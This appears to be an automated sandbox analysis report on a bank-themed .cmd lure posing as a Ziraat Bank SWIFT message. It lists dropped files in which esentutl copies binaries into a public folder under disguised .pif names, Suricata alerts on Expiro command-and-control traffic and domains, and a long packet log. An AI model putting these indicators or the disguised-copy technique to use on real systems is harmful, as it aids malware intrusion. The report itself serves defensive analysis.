
                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.623913469564284
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qzBBVmXxTzmBzeSbZ7u0wxDDDDDDDDjCaY5e9aYAV/TB8NGNTI:iBB0XxTzkzp7u0wQake9aT/t8Nb
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8912B76089305211B68DD61738BE4F92
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:19A9527FB3D4A818102A3788BBC6B01545D3D381
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:755CE474174DE728A6B44280797E70107A80FBCE7913CA8DCB19FD2B92F4884C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AD2F50A2ADA26942B5C9B719A21B49F664FDB6665221F984D2122E336CEB166D36013D63925F3247B4EFE2F4F9F41F8434F4A60034EE1F8AE21A1DB4F496A4B4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b600 (1226240) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.110 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                                    \Device\Null

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):560
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.531408806270406
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGN2FI:/p4xT5cp7u0wQakB4aV4t8N0
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE7187E169AF0EDE104977788ECC390D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5A796ECD0808A540F708BFA4C43FF5295B324F23
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2E0D33DC849A7490058C38486E17F33365411663130ABCBDBA5A2293646B07CB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:53ED16BD667612A24E5840B86902ABCE2E4C2B22471CBE3923490448719CE1F0D48DCD2D8DF38F66F572C4EE39CFE5C52190BBDD2B3237F5C38CE556C2ED8C8D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.47 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                                                                                                    File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.761002854360995
                                                                                                                                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                                      File name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:3'381'962 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:5f351f07b94613764a8bc09970bbcd58
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:47fcfcac926a0007010b7afb776671d2276b8b81
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256:2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512:49ddfcc8f58117ec824e35b1a2bf6928cf580e4337a8f9aa1d7d4dc62a6e93bb811702d0ed2c970f1f0a08b013ffc5ba6dcc6951c6d59f9a0d7915c3b9f3baae
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:/EldPvpS3bi8Kz95FnA8S21f063u9vsk/ZkSgR+lY1Q7FZU1n9dJCNUeE1Zperr8:/ARo3biB55HSwTBvfbb
                                                                                                                                                                                                                                                                                                                                                                                                                                      TLSH:C7F511A33ECD15CA1B0A7797DF4BE7148A5B8C1C1BA27D8442D30D4879272CB95E0ADB
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Content Preview:COMCOM@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....

                                                                                                                                                                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                                                                                                                                                                      Icon Hash:9686878b929a9886

                                                                                                                                                                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:12.974837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700198.252.105.91443TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:51.616371+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.749883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:51.616371+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.749883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:53.165851+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749888TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:53.165851+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749888TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:55.358034+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.749906TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:55.358034+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.749906TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:55.359429+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7594651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:57.035382+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74991454.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:57.079419+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7505011.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:56:58.704311+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7600921.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:01.012200+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7502481.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:29.842892+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7545671.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:31.231494+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7545071.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:33.379985+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.750011TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:33.379985+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.750011TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:35.196947+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.750013TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:35.196947+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.750013TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:40.703360+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.750018TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:40.703360+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.750018TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:48.496579+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.750025TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:48.496579+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.750025TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:49.313279+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.750026TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:49.313279+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.750026TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:57:58.560314+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.75002882.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:08.560846+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.750043TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:08.560846+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.750043TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:15.584854+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.750054TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:15.584854+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.750054TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:39.026226+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.750091TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:39.026226+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.750091TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:39.336228+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.7611181.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:58.230245+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.7502421.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:59.043100+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.750124TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:58:59.043100+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.750124TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:02.553719+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.75013272.52.178.2380TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:05.904050+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.7537581.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:12.740525+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.7557731.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:17.857629+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.7587511.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:17.880138+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.7587511.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:21.215052+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.7530531.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:21.247295+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.7530531.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:23.892905+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.7528191.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:31.371397+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.7654641.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:31.395946+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.7654641.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:42.932074+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.7555891.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T09:59:51.959681+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.7592181.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:01.256401+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7539261.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:03.724220+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.760112172.234.222.14380TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:03.732796+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7625101.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:07.633314+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7519801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:09.051307+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7571651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:09.083433+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7571651.1.1.153UDP

                                                                                                                                                                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.257720947 CET49699443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.257760048 CET44349699198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.258018017 CET49699443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.262459040 CET49699443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.262527943 CET44349699198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.262598038 CET49699443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.336122990 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.336179972 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.336261034 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.363207102 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.363231897 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.974756002 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.974837065 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.979268074 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.979279995 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.979558945 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.033847094 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.077647924 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.123337030 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.201311111 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.256690025 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468240023 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468252897 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468301058 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468317032 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468317032 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468332052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468349934 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468379974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.468411922 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.469984055 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.469993114 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470024109 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470041990 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470052958 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470062017 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470096111 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.470112085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.553956032 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.553977966 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.554064035 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.554095984 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.554137945 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671309948 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671344995 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671422005 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671447039 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671480894 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.671497107 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936279058 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936290026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936347961 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936419010 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936448097 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936486006 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.936517954 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937597036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937613010 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937745094 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937762022 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937809944 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140566111 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140620947 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140656948 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140683889 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140754938 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259717941 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259742975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259824991 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259838104 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259934902 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.404936075 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.404969931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405030012 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405056000 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405095100 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405116081 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611000061 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611032009 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611093044 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611140966 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611162901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611219883 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728318930 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728353977 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728413105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728439093 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728461981 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728482962 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995064020 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995081902 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995129108 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995191097 CET49700443192.168.2.7198.252.105.91
